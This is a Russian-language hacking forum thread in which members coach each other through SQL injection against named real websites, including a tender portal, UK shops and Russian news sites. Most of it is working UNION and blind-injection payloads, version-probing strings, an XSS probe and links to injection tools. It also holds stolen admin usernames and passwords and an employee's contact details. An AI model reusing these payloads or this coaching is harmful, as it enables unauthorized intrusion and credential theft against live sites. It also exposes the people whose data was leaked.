SELECT * FROM users WHERE name='[name]' AND pass='[pass]';
Параметры [name] и [pass] передаются через GET/POST.
Совсем ли это дохлый номер при экранировании кавычек? (Случаи с двойным урлэнкодом и тупым брутом не рассматриваю)
и еще, существуют ли способы обхода защиты типа:
$id=(INT)$_GET[id];
Может есть для этого какие-нибудь баги в PHP?
Спасибо oRb. (+)
Но все равно я из этого ничего не смогу выжать.
Я ведь арабов ломать не собираюсь.[:)]
Тут еще вот такой вопрос есть:
как я могу проверить, включены ли register_globals на сервере?
[code]
Это являестся одной из угроз безопасноти,которая более-менее исправлена.ну иногда навстречаются сервера без патча,потмоу упомяну.
Еще из php b php4,во время передачи данных в скриптах в качестве зарегистрированных глобальных переменных.Например:
Код:
script.php?somevar=blahblah&anothervar=123
Если пхп настройки вашего сервера позволяют зарегистрированные глобальных переменных,переменные somevar и anothervar станут глобальные переменные PHP $ somevar (содержащие строку "blahblah") и $ anothervar (содержит целое число 123).
Вы не должны использовать громоздкие $ _GET [ 'somevar'] и $ _GET [ 'anothervar'].Так как это создает угрозу безопасности.Если злоумышленник каким-то образом узнает имена переменных в ваших скриптах и приходит к выводу о том, что вы используете переменные без ее инициализации , все что он доллжен сделать, это пройти на определнный юрл, как в примере выше.
Часто испоьзуют "неинициализированные" переменные,тоесть:
Код:
<?php if ($a=1) $somevar="thisorthat";
$res= mysql_query("INSERT INTO sometable (somefield) VALUES ('{$somevar}')");
?>
Начинающий PHP-программист думает , что $ somevar является NULL, если $ не 1 , поэтому SQL будет действителен. Но хакер увидит возможность!
[/code]
Pashkela, я это понимаю. Я хочу узнать, как мне без ковыряния исходников (только командами) определить включены ли register_globals или нет?
http://chess.rambler.ru/app_support/SmartError.aspx?1&eid=rainbow_rb_Admin_e620382a3eea44be9fa3c07a62bc84d7
плиз подскажите вот тут один сайт я хотел-бы только узнать есть тут уязвимость кокая-нить, не могу найти sql injection
да понятно что в этом запросе нет я хотел -бы знать сайт уезвим или нет ,и как проверить на уезвимость
[link=http://www.chessplanet.ru/]http://www.chessplanet.ru/[/link]
сам он написан на html а когда я подстовляю doc [link=http://www.chessplanet.ru/doc/]http://www.chessplanet.ru/doc/[/link] то страничка после переключается в конце aspx я еге весь перековырял не ужели есть сайты которые не возможно ламонуть
http://chess.rambler.ru/Portals/_Rainbow/testFlash/flashversion.aspx
самое важное тут как заюзать
Я только начинающий, но мысли есть:
1)
Сидел я на лекции...
И тут зашла ко мне в голову интересная мысля на тему блинд инъектов.
Допустим, есть на сайте выбор страницы из базы по id. (распространенный случай)
SELECT * FROM pages WHERE id=[id];
И, допустим, UNION не работает. (кодер не полный лох и поставил фильтрацию по нему)
Что остается? Слепая инъекция.
А теперь допустим, что инфы нужно извлечь много.
Перебор по попаданию кода символа в определенный диапазон получится ОЧЕНЬ долгим.
А теперь допустим, что страниц в базе много. (для полного кайфа >=255)
Тогда можно получать один символ за один запрос!!![:)]
Пишем брут, который сначала перебором создаст базу всех страниц.
?id=1
?id=2
…
?id=255
Вторым шагом будет собственно сбручивание всего подряд.
?id=ascii(substring((SELECT…),1,1))
И таким образом по виду вернувшейся страницы, мы точно узнаем код символа.
Если еще для всех генерируемых страниц будут разные титлы, то даже не понадобится догружать страницу целиком.
Даже если выводимых страниц мало, для тех же хешей паролей нам нужно будет всего 16 страниц, айдишники которых можно будет связать уравнением с возвращаемыми кодами символов.
А теперь рассмотрим совсем хронический случай, когда не работает не только UNION, но и SELECT. (Опять же, кодер не полный лох и поставил фильтрацию и по нему, или же админ полный лох и юзает MySQL MAMONT EDITION <4.0[:)])
В таком случае при наличии прав можно брутом посимвольно читать файлы на сервере.
?id = ascii(substring(load_file(“filename.php”),1,1));
Как правило, много брутить не придется, т.к. вшитые пароли, инклуды и т.д. обычно помещают в начале кода.
Ну, вот вроде и все. Жду Ваших отзывов.
З.Ы. Заранее извиняюсь, если изобрел велосипед.
Дело не велосипеде, просто есть такое слово - автоматизация. О чем я тебе и писал чуть повыше. Ты тогда сказал "ручками" интересней". Но сам пришел к правильному решению (пост твой внимательно не читал, но видно, что таки приходим к бруту прогамным путем)
В тот раз я видимо неправильно выразился.
Я имел в виду, что ручками интересней ломать - прощупывать дырку, определять типы фильтраций и т.д.
Брутить уже ощупанную дыру руками, ясное дело, будет только мазохист.
В случае, который я рассмотрел автоматизированный брут идет гораздо быстрее и расширяются его возможности.
Да, тоже не плохой вариант, но если страниц меньше чем 256, то жопа[:)]
Можно пользоваться >, <, =. Тогда количество запросов сократится в разы.
Почему же жопа?
Во-первых, не все символы [0-255] используются.
Во-вторых, можно использовать два запроса на один символ. Тогда будет достаточно 16 страниц. Я уже практически составил эти запросы.
Старые блинды ориентировались на ответ "страница или ошибка", т.е. для сбручивания одного символа надо аж 8 запросов!
Для сбручивания по моему принципу "какой id соответствует вернувшейся странице" один символ можно сбрутить за 1, в худшем случае 2 запроса!!!!!!!!!!![:)][:)][:)]
В любом случае колоссальный выигрыш.
Подскажите кто-нибудь.
Когда я отправляю неверный запрос, на одних серваках вылетает ошибка PHP, мол, ошибка в таком-то файле, такой-то строке (с открытием полного пути к файлу). Вылет таких ошибок регламентирует DISPLAY_ERRORS=on|off.
Но на других серваках вылетает ошибка мускула, открывающая запрос к базе.
Отчего так происходит?
Это директивы конфигурации самого мускула?
помогите подобрать иньекцию или подтолкните меня безтолкового !(
http://www.usetender.com/view_other_company_face.shtml?sid=&faceid=-1
проблема в том что UNION не проходит [code] [warning : 173 : select execution error 'ERROR: syntax error at or near "UNION" LINE 1: ...spam FROM face AS F,company AS C WHERE (F.id = -1 UNION SELE... ^' in command 'SET_FROM_SELECT:$THIS.type|$THIS.companyid|$THIS.status|$THIS.login|$THIS.password|$THIS.name|$THIS.phone|$THIS.fax|$THIS.email|$THIS.department|$THIS.faceposition|$THIS.blocked|$THIS.companytitle|$THIS.antispam:EXPORT_DATA = F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam;FROM = face AS F,company AS C;F.id = $THIS.faceid AND C.id = F.companyid', select string : 'SELECT F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam FROM face AS F,company AS C WHERE (F.id = -1 UNION SELECT 1-- AND C.id = F.companyid)'] [warning : variable $companyid does not exist in command 'SET_FROM_SELECT:$THIS.mainfaceid:EXPORT_DATA = id;FROM = face;ORDER_BY = type DESC;LIMIT = 1;companyid = $THIS.companyid AND type IN (1,2)']
[/code]
Сообщение - муть какая-то.
Но попробую разобраться.
Попробуй
&faceid=1+/*!00000 '*/
Если вылетела ошибка значит это мускул. Дальше
&faceid=1+/*!30000 '*/
&faceid=1+/*!40000 '*/
&faceid=1+/*!50000 '*/
Увеличивай первую цифру до тех пор пока не вылезет ошибка. Тогда возвращайся на шаг назад и начинай увеличивать вторую опять до появления ошибки.
Определи так хотя бы первые три цифры.
Таким образом получи версию мускула. А там посмотрим.
P.S.
Попробуй так:
&faceid=-1)+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Если не получится то замени в конце -- на /*
Напиши, что выдаст.
[code][image]http://www.usetender.com/images/spacer.gif[/image] [warning : 173 : select execution error 'ERROR: unterminated /* comment at or near "/* AND C.id = F.companyid)" LINE 1: ... -1) UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14/* AND C.i... ^' in command 'SET_FROM_SELECT:$THIS.type|$THIS.companyid|$THIS.status|$THIS.login|$THIS.password|$THIS.name|$THIS.phone|$THIS.fax|$THIS.email|$THIS.department|$THIS.faceposition|$THIS.blocked|$THIS.companytitle|$THIS.antispam:EXPORT_DATA = F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam;FROM = face AS F,company AS C;F.id = $THIS.faceid AND C.id = F.companyid', select string : 'SELECT F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam FROM face AS F,company AS C WHERE (F.id = -1) UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14/* AND C.id = F.companyid)'] [warning : variable $companyid does not exist in command 'SET_FROM_SELECT:$THIS.mainfaceid:EXPORT_DATA = id;FROM = face;ORDER_BY = type DESC;LIMIT = 1;companyid = $THIS.companyid AND type IN (1,2)']
[/code]
В данном случае запрос походу правильный, но дело в том, что не закрыт коментарий.
Проведи:
&faceid=-1)+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
&faceid=-1)+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14%23
Напиши, что ответит.
Я и сам бы попробовал, но у меня сейчас плохая линия и анонимайзер не хочет работать.[:(]
Это уже интересно.
Даже если не выйдет инъекция, то уж по крайней мере пассивный XSS тут уже виден.
Попробуй:
&faceid=-1)+UNION+SELECT+1,<sсriрt>alert(/XXX/)</sсriрt>,3,4,5,6,7,8,9,10,11,12,13,14--
Кстате проверь фильтрацию кавычек:
&faceid=1'
Теперь дальше:
&faceid=-1)+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- походу сработал, но проблема в типах присоединяемых величин.
Давай так:
&faceid=-1)+UNION+SELECT+'1','2','3','4','5','6','7','8','9','10','11','12','13','14'--
на ковычку -
[code] [warning : 173 : select execution error 'ERROR: unterminated quoted string at or near "' AND C.id = F.companyid)" LINE 1: ...tispam FROM face AS F,company AS C WHERE (F.id = 1' AND C.id... ^' in command 'SET_FROM_SELECT:$THIS.type|$THIS.companyid|$THIS.status|$THIS.login|$THIS.password|$THIS.name|$THIS.phone|$THIS.fax|$THIS.email|$THIS.department|$THIS.faceposition|$THIS.blocked|$THIS.companytitle|$THIS.antispam:EXPORT_DATA = F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam;FROM = face AS F,company AS C;F.id = $THIS.faceid AND C.id = F.companyid', select string : 'SELECT F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam FROM face AS F,company AS C WHERE (F.id = 1' AND C.id = F.companyid)'] [warning : variable $companyid does not exist in command 'SET_FROM_SELECT:$THIS.mainfaceid:EXPORT_DATA = id;FROM = face;ORDER_BY = type DESC;LIMIT = 1;companyid = $THIS.companyid AND type IN (1,2)']
[/code]
на
Ты не нуб, просто это не база а хрен его знает что.[:@]
Но впрочем ковычки не фильтруются , что уже радует.[:)]
Теперь проблема в том, что одно поле - логическое.
Попробуй:
&faceid=-1)+UNION+SELECT+'1','2','3','4','5','6','7','8','9','10','11','12','13',1--
[warning : 173 : select execution error 'ERROR:[u][b]UNION types boolean and integer[/b] [/u]cannot be matched' in command'SET_FROM_SELECT:$THIS.type|$THIS.companyid|$THIS.status|$THIS.login|$THIS.password|$THIS.name|$THIS.phone|$THIS.fax|$THIS.email|$THIS.department|$THIS.faceposition|$THIS.blocked|$THIS.companytitle|$THIS.antispam:EXPORT_DATA=F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam;FROM= face AS F,company AS C;F.id = $THIS.faceid AND C.id = F.companyid',select string : 'SELECTF.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispamFROM face AS F,company AS C WHERE (F.id = -1) UNION SELECT'1','2','3','4','5','6','7','8','9','10','11','12','13',1-- AND C.id =F.companyid)'] [warning : variable $companyid does not exist in command'SET_FROM_SELECT:$THIS.mainfaceid:EXPORT_DATA = id;FROM = face;ORDER_BY= type DESC;LIMIT = 1;companyid = $THIS.companyid AND type IN (1,2)']
[8|]
Так, это уже тихо начинает напоминать мне PostgreSQL.
Если так, то при случае эта дыра может превратиться в Клондайк.[:)]
Оно не приводит чила к логическим данным
Пробуй:
&faceid=-1)+UNION+SELECT+'1','2','3','4','5','6','7','8','9','10','11','12','13',TRUE--
Значит запрос полностью корректен.
Но то, что он ничего не выводит это плохо.[>:]
Я подумаю, что с этим можно сделать.
Вечером напишу какие-нибудь мысли.
буду ждать вечера, а пока еще сам покопаю поучусь так сказать =p
Попробуй просто пощелкать:
&faceid=1
&faceid=2
&faceid=3
&faceid=4
Заметь какая информация меняется (Названия, телефон, факс, мыло и т.д.)
Попробуй вот так:
&faceid=-1)+UNION+SELECT+F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam+FROM+face+AS+F,company+AS+C--
насчет первого запроса - пустая страница [8D]
а во втром запросе непроходит знак - '-' пишет что токо [b][u]integer[/u][/b]
[image]http://www.usetender.com/images/spacer.gif[/image] [image]http://www.usetender.com/images/spacer.gif[/image] [link=http://www.usetender.com/]Tender.Pro[/link] // [link=http://www.usetender.com/company_list.shtml?sid=&scid=0&sfid=0&companyid=0] Каталог компаний участников [/link] // [link=http://www.usetender.com/view_other_company.shtml?sid=&scid=0&sfid=0&companyid=0&companyid=22903] Белон [/link] // [b] Фатеев Александр Владимирович [/b]
[align=right]
d=document; Dserv=1227453085000;//Гринв.вр.сервера в миллисекундах Dclient=(D=new Date()).getTime(); DD=Dserv-Dclient; function clock1(){ var D0; D0 = new Date; hms('timeS',new Date(D0.getTime()+DD)); } function hms(layr,X){var m,s; d.getElementById(layr).innerHTML =X.getHours()+':'+((m=X.getMinutes()) [/align] [image]http://www.usetender.com/images/spacer.gif[/image]
О сотруднике компании "Белон"
[b]Фатеев Александр Владимирович[/b]
Начальник ОМТС
[b]Департамент:[/b] ОАО "БПТ" (Группа Белон)
[b]Контактный телефон:[/b] 8 38452 34482
[b]Факс:[/b]
[b]E-mail:[/b] [b][color="#0099cc"]@[/color][/b] [link=http://www.usetender.com/not_registered_mail.shtml?sid=&scid=0&sfid=0&faceid=30234]Написать письмо[/link]
Дьявол. Да что же это за хрень.
Ну а если так:
&faceid=-1)+UNION+SELECT++FF.type,FF.companyid,FF.status,FF.login,FF.password,FF.name,FF.phone,FF.fax,FF.email,FF.department,FF.faceposition,FF.blocked,CC.title,CC.antispam+FROM+face+AS+FF,company+AS+CC+WHERE+(FF.id=1+AND+CC.id=FF.companyid)--
И еще, в твоем запросе два параметра. В один ты подставляешь код, а другой не оставляй пустым. Задай ему какое-нибудь валидное значение.
Блин.
Ну вобщем так.
Здесь возможна слепая инъекция. Если не знаешь, как это делать, вот статья:
http://www.xakep.ru/magazine/xa/111/056/1.asp
Хотя это далеко не лучший вариант.
&faceid=-1)+UNION+SELECT+'1','2','3','4','5','6','7','8','9','10','11','12','13',FALSE--
По всем правилам, этот запрос должен вывести некоторые цифры из запроса в места, где при нормальном запросе имя, название фирмы, телефон, факс и т.д. Какого крена он этого не делает?
НАРОД, ПОДКЛЮЧАЙТЕСЬ К ОБСУЖДЕНИЮ.
Или может попробовать так:
&faceid=-1+AND+C.id=F.companyid)+UNION+SELECT+'1','2','3','4','5','6','7','8','9','10','11','12','13',FALSE--
&faceid=-1+AND+C.id=F.companyid)+UNION+SELECT+'1','2','3','4','5','6','7','8','9','10','11','12','13',TRUE--
Напиши, что вернулось.
-1+AND+C.id=F.companyid)+UNION+SELECT+'1','2','3','4','5','6','7','8','9','10','11','12','13',FALSE--
выдает что AND это boolean а нужно integer
c TRUE аналогично
читаю статью... может допрет...
Чтобы юзать скуль-иньeкции,нужно как минимум знать PhP?
sql нада знать... sql...
Так, начнем от печки.
Проверь запрос:
&faceid=1
если выводит какие-нибудь данные о ком-нибудь, то едем дальше (если нет, то ищи число, которое работает нормально, и дальше подставляй уже его):
&faceid=1+AND+TRUE)--
если выводит то же самое, то едем дальше:
&faceid=1+AND+(ascii('d')<1000)--
если выводит то же самое, то едем дальше:
&faceid=1+AND+(ascii(substring((SELECT+1),1,1))<1000)--
если выводит то же самое, значит, возможна слепая инъекция.
Теперь другие варианты:
&faceid=1+ORDER+BY+F.type--
&faceid=1+GROUP+BY+F.type--
&faceid=1;SELECT+1--
Самое галимое будет, если этот запрос не конечный, а полученные им данные используются во втором запросе, и результат мы видим уже второго запроса. Тогда нас в психушку увезут.[:D]
P.S. И вот еще. Этот запрос какой-то мутный. Поищи на сайте более простые запросы. Может с другим запросом повезет больше.
Подробно опиши, какой запрос что вернул, и что ты еще нашел на сайте. Я тебе завтра отвечу.
при подачи его
извините за тупой вопрос... но с чего начать? Например есть "site.com/index.php". И что с этим делать?
Спасибо. Тут действительно понятно написано. +1
Привет всем!
Вообщем вот сайтик...сегодня парился.....
помогите немогу имя подобрать
Вот это первый
http://www.drumshop.co.uk/product.php?id=99999+union+select+1,2,3,4,concat(ID,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+users+admins--
А вот второй
http://www.streetendfeeds.co.uk/productdetails.php?id=789789789789%20UNION%20SELECT%201,2,SYSTEM_USER(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,password,22,23+from+admin+user--
Прошу только совет что делать дальше...не ломайте!!
Заранее спасибо![:)]
УРА! Психушка отменяется![:D][:D][:D]
Ну а теперь по полкам:
На сервере выполняется запрос вида:
SELECT F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam
FROM face AS F,company AS C
WHERE (F.id = [faceid] AND C.id = F.companyid)
После этого берется из него значение поля F.companyid и подставляется во второй запрос:
SELECT id
FROM face
WHERE (companyid=[F.companyid] AND type IN(1,2))
ORDER BY type DESC
LIMIT 1
(В конце ошибок был намек на такой запрос)
Видимо без данных, полученных из второго запроса, сервер не хотел работать.
А если ему передается F.companyid для которого ничего не найдется - то и данных нет.
Возможно это не конечный запрос, т.к. извлекается параметр id, а просто так он никому не нужен.
Ну да ладно, главное есть выводимые поля.
Что дальше делать знаешь?
наверно задергал до смерти! [&:] спс за фсе !!!!!!
не представляю что меня ждет впереди. я не знаю что мне делать)
2 Fuck_Them_All:
1) 4.1.11-Debian_4sarge2 [b](SIPT4.0)[/b]
http://www.drumshop.co.uk/product.php?id=99999/**/union/**/select/**/1,22,23,24,unhex(hex(version())),26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--
2) 5.0.45-community-nt [b](information.schema)[/b]
http://www.streetendfeeds.co.uk/productdetails.php?id=789789789789%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
Pashkela
Спасибо конеш...но что делать дальше?
horiz
Вот
5.0.45-community-nt:streetendfeeds:streetendfeeds@localhost
http://www.streetendfeeds.co.uk/productdetails.php?id=789789789789%20UNION%20SELECT%201,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,password,22,23+from+admin+phpMyAdmin--
2 [b]Fuck_Them_All[/b]
по случаю намбер 1:
http://pashkela.narod.ru/progi/sipt4.rar
по случаю намбер 2:
http://pashkela.narod.ru/progi/MySQL5tool.rar
Список колонок из таблицы admin:
-------
1:id
2:UNAME
3:PASSWORD
4:U_AREA
-------
=============================
Количество значений из таблицы admin по полю id:
-------
2
-------
Данные по полям id,UNAME,PASSWORD из таблицы admin:
-------
2:spooks%1/4g:hv7/se3*Ј
3:flynn@pp*/8:zzpf129?m
есть одна проблема =( что я ввожу
Pashkela
Спасибо!!!!причём огромное!!
Pashkela
Эм..а какой пароль к архиву?? MD5tool
а нет - прошел user без скобок в 10 столбце остальное выводи в чистом виде скобки ввобще не терпит сразу кричит, в некот случаях выдает результат запрашиваемый - database()
О сотруднике компании "1"
[b]6[/b]
11
[b]10 столбец ---- Департамент:[/b] [size="3"][u]postgres [/u][/size]
[b]Контактный телефон:[/b] database()
[b]Факс:[/b] version
[b]E-mail:[/b] [b][color="#0099cc"]@[/color][/b] [link=http://www.usetender.com/not_registered_mail.shtml?sid=&scid=0&sfid=0&faceid=-30234%29%20UNION%20SELECT%201,1212,%273%27,%274%27,%275%27,%276%27,%27database%28%29%27,%27version%27,%279%27,user,%2711%27,%2712%27,%271%27,TRUE--]Написать письмо[/link]
[image]http://www.usetender.com/images/spacer.gif[/image]
2 Fuck_Them_All:
)) Забыл, 123
да, ты прав! мне еще надо многое учить и дергаться на какие нить забытые сайты =) кому надо пусть копают, кстати вот что вывел на последний запрос :
[code] [warning : 173 : select execution error 'ERROR: syntax error at or near "(" LINE 1: ...,1212,'3','4','5',database(),'7','8','9','10',user(),'12',ve... ^' in command 'SET_FROM_SELECT:$THIS.type|$THIS.companyid|$THIS.status|$THIS.login|$THIS.password|$THIS.name|$THIS.phone|$THIS.fax|$THIS.email|$THIS.department|$THIS.faceposition|$THIS.blocked|$THIS.companytitle|$THIS.antispam:EXPORT_DATA = F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam;FROM = face AS F,company AS C;F.id = $THIS.faceid AND C.id = F.companyid', select string : 'SELECT F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam FROM face AS F,company AS C WHERE (F.id = -30234) UNION SELECT 1,1212,'3','4','5',database(),'7','8','9','10',user(),'12',version(),TRUE-- AND C.id = F.companyid)'] [warning : variable $companyid does not exist in command 'SET_FROM_SELECT:$THIS.mainfaceid:EXPORT_DATA = id;FROM = face;ORDER_BY = type DESC;LIMIT = 1;companyid = $THIS.companyid AND type IN (1,2)']
[/code]
скобку невспринемает =\ ладно биг спс за активную помощь! никогда не видел такого интузиазма со стороны форумцев! [:)] респект те !
ушел листать mysql...
HORIZ
Моя аська 372023465
Постучите пожалуйста
Тоесть Pashkela вот моя аська 372023465
Извините за неряшливость!
Эх.......и я тож....свалил Листать Mysql
2 Fuck_Them_All:
неа:) На каждую прогу, что я тебе дал, есть свой RTFM. Не надо совсем уж халявить. Децл таки придется поднапрячься. По второму варианту подробнейший readme есть, по SIPT4 -
http://dbattack.com/forum/viewforum.php?f=3
официальный сайт создателя
Pashkela
Причём тут халявить)))Я во всём разобрался.......говорю СПАСИБО!!!)))).......[:D]
Всем удачи и хорошего коннекта)))Я сваливаю на 2 месяца в Los Angeles!!!!!)))))[:)][:)][:)]
Хех)) Pashkela Спасибо за помощь!!!!!
Подскажите пожалуйста. В одном факе видел запись запроса в таком виде: [link=http://xxx/news.php?id=-1']xxx/news.php?id=-1'[/link] union select 1,2,3 --
В другом аналогичный запрос вроде бы выглядит так: [link=http://xxx/news.php?id=-1'+union+select+1,2,3+/]xxx/news.php?id=-1'+union+select+1,2,3+/[/link]*
Ну допустим в разных версиях Мускуля разный набор символов определяющих начало коммента. Но почему в одном запросе пишем "...+union+select+...", а в другом просто "union select"?
нет , в одном случае фильтруются знаки пробела, в другом нет. ещё + пишут из эстетического понимания, мне так легче читается
Всегда вместо пробелов и плюсов ставь /**/
Спасибо. Не понял правда почему, но буду разбираться :-)
я не знал что комментарий идентичен пробелу. а то что это /**/ пустой коммент это понятно. чем хуже плюсы я не знаю. человек подсказал я и хотел узнать почему. искал в гугле но пока не нашёл
Так. Давайте все расставим по полкам.
+ используется как аналог пробела в строке запроса (т.е. вместо %20 для более короткой и прозрачной записи).
Попадая на сервер, он сразу преобразуется в пробел. Так что против фильтраций он не поможет (если только фильтрации не подвергается $_SERVER[QUERY_STRING]).
И если вы в консоли мускула введете
SELECT+user+FROM+mysql.user;
он пошлет вас подальше.
А вот многострочные комментарии /**/ уже по правилам мускула считается как пробел.
http://kengu.ru/news.php?get=4172' вот нашел, помогите то нить сделать с ссылкой :)
не нашел нужного не понял я :( помогите (((
1) Проверяем:
?get=4172
?get=4173-1
Если вернулось одно и то же, значит здесь дыра.
2)
?get=-1+UNION+SELECT+1--
?get=-1+UNION+SELECT+1,2--
?get=-1+UNION+SELECT+1,2,3--
И т.д. пока не перестанет появляться ошибка.
Дальше смотришь, где на странице появились цифры из твоего запроса.
В запросе вместо появившихся цифр ставь
version()
database()
user()
и смотри, что покажет.
Проделай все и напиши.
а потом что мона сделать с ним?
http://kengu.ru/news.php??get=-1+UNION+SELECT+1,2,3-- вот тут нет ошибки просто я не знаю как мона сделать
Дальше смотришь, где на странице появились цифры из твоего запроса.
В запросе вместо появившихся цифр ставь
version()
database()
user()
и смотри, что покажет.
Проделай все и напиши.
"http://kengu.ru/news.php??get=-1+UNION+SELECT+1,2,3--"
ошибки в таком случае не будет никогда, хоть удали вообще "+UNION+SELECT+1,2,3--" или поставь любое кол-во колонок - надо сначала найти страницу, которая выдает ошибки, и это не должен быть xml
И что можно с этим сделать??
Ничего, читай на два поста выше
Я и имел в виду, что прежде чем постить, проверяй, что хоть постишь. То, что пишите вы - полный бред. Пока вы там не нашли никакой SQL-inject
А если и нашли, то не можете понять, как её использовать
Просто когда в этот раздел пишу что-то вроде:
Ппц жалб просто gbpltw :(((
Приветствую великих и ужасных)
Собственно прошу помочь найти адресок с данными, не знаю по теме или нет.
Итак, известный Torrents.ru. Мне нужна строка, в которую можно вбить данные (логин, пароль), обходя тем самым форму.
Порывшись в гугле нашел только вот такую строчку
[link=http://torrents.ru/forum/login.php?login_username=kpn3m0&login_password=123456&autologin=0&redirect=viewforum.php&f=7][u][color=#800080]http://torrents.ru/forum/login.php?login_username=kpn3m0&login_password=123456&autologin=0&redirect=viewforum.php&f=7[/color][/u][/link]
пользователя, естественно, уже не существует)
Пробовал различные комбинации, добрел до такой
[link=http://torrents.ru/forum/login.php?login_username=USER&login_password=PASSWORD&autologin=0&redirect=viewforum.php&t=1]http://torrents.ru/forum/login.php?login_username=USER&login_password=PASSWORD&autologin=0&redirect=viewforum.php&t=1[/link]
где USER и PASSWORD брал своего акк.
Не проходит ни в какую.
Попутный вопрос, поле redirect=viewforum.php&* под звездочкой могут быть разные ключи, на что влияют ключи, можно ли где посмотреть полный список и описание?
В общем, прошу помочь, если нужно поставлю ++
[font="times new roman"][size=3] [/size][/font]
Нужна Ваша помощь.. подскажите что не так..
Имена таблиц вытащил запросом -
?id=51+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+1,1--
Нашел нужную мне таблицу допустим - admin. Хочу посмотреть её поля составляю такой запрос -
?id=51+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_name='admin'+limit+1,1--
(кавычки вроде не фильтруются) на что получаю такую ошибку-
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/gtacom/domains/xxx.xxx.xx/public_html/file_sa_details.phtml on line 11
Версия мускула - 5.0.51
Ребята помогите плыз с инекцией! Как подобрать имена столбцов и полей?
http://www.it-dominanta.ru/vac_details.asp?ID=485+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+news
А что за БД, какая версия?
Выводимые поля есть?
Напиши как можно больше инфы.
Вроде не одно и то же... :)
В том то и проблема что версию узнать не получаецо! Выводимые поля есть, и много! Перейди по ссылке и посмотри результат.
Уважаеме там мс акссес,а не майй скл
А разве из аксеса нельзя вытащить нужные данные!?
Если можно, то как?
брути нужную таблицу и колумны....
В мс аккесс есть системные таблицы с названием таблиц но в твоём случае нет привилегий(это в большинстве)
А как это можно заюзать?
[link=http://www.taxcon.ru:7000/categories/2-Дневники-алкоголиков?popular=1']http://www.taxcon.ru:7000/categories/2-Дневники-алкоголиков?popular=1'[/link]
Никак, хотя бы потому, что по адресу http://www.taxcon.ru:7000/categories/2-Дневники-алкоголиков?popular=1 тоже самое
Имеется пара скромных вопросов от начинающего:
Что делать если при определении количества полей запросами: ?id=1+order+by+1-- или ?id=1+union+select+1,2,3--
не удаётся добиться ошибки, т.е. полей получается бесконечное количество, сколько не перебирай.
Далее.. Допустим количество полей определено, но не одно из них не выводиться на экран. Через чего в таком
случае выводить нужные данные?
...
Это называется Blind SQL-inject, т.е. слепая скуль-инъекция, но и то не факт, вполне может быть, что то, что нашел ты - вовсе не SQL-inj, надо конкретно рассматривать каждый случай, универсального принципа на все ситуации нет в природе
Возникла такая проблема:
Имеется две нужные таблицы admins и lotus_users. Извесны имена полей из обоих таблиц.
Запросом ?id=-10+union+select+1,2,3,4,concat(admin_login,char(58),admin_password),6,7,8+from+admins+limit+1,1--
удачно втащил все нужные мне данные. Теперь практически таким же запросом обращяюсь к таблице lotus_users
?id=-10+union+select+1,2,concat(username,char(58),user_password),4,5,6,7,8+from+lotus_users+limit+1,1--
но получаю ошибку:
Database error. Can't execute query.
The used SELECT statements have a different number of columns
Query: select u.*, DATE_FORMAT(u.postdate, '%d') as day, DATE_FORMAT(u.postdate, '%m') as month, DATE_FORMAT(u.postdate, '%Y') as year from urefer u where u.topic = 3 and u.refer_id = -10 union select 1,2,concat(username,user_password),4,5,6,7,8 from lotus_users limit 1,1-- order by u.postdate
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/home/koleso/domains/ххххх/public_html/classes/class.MySQL.php on line 83
Что посоветуйте?
ver 5.0.22
?id=-10+union+select+1,2,3,4,concat(admin_login,char(58),admin_password),6,7,8+from+admins+limit+1,1--
?id=-10+union+select+1,2,concat(username,char(58),user_password),4,5,6,7,8+from+lotus_users+limit+1,1--
а почему ты в разные поля вставляешь? У тебя 3 и 5 принтабельные?
Да. Принтабельные 3 и 5 поля.
привет, помогите чтонибуть узнать
http://****.ru/search/index.php?search='?/*
выдаёт:
скорее всего lotus_users находится в другой БД, поэтому несовпадение по кол-ву колонок
Выполни такие запросы:
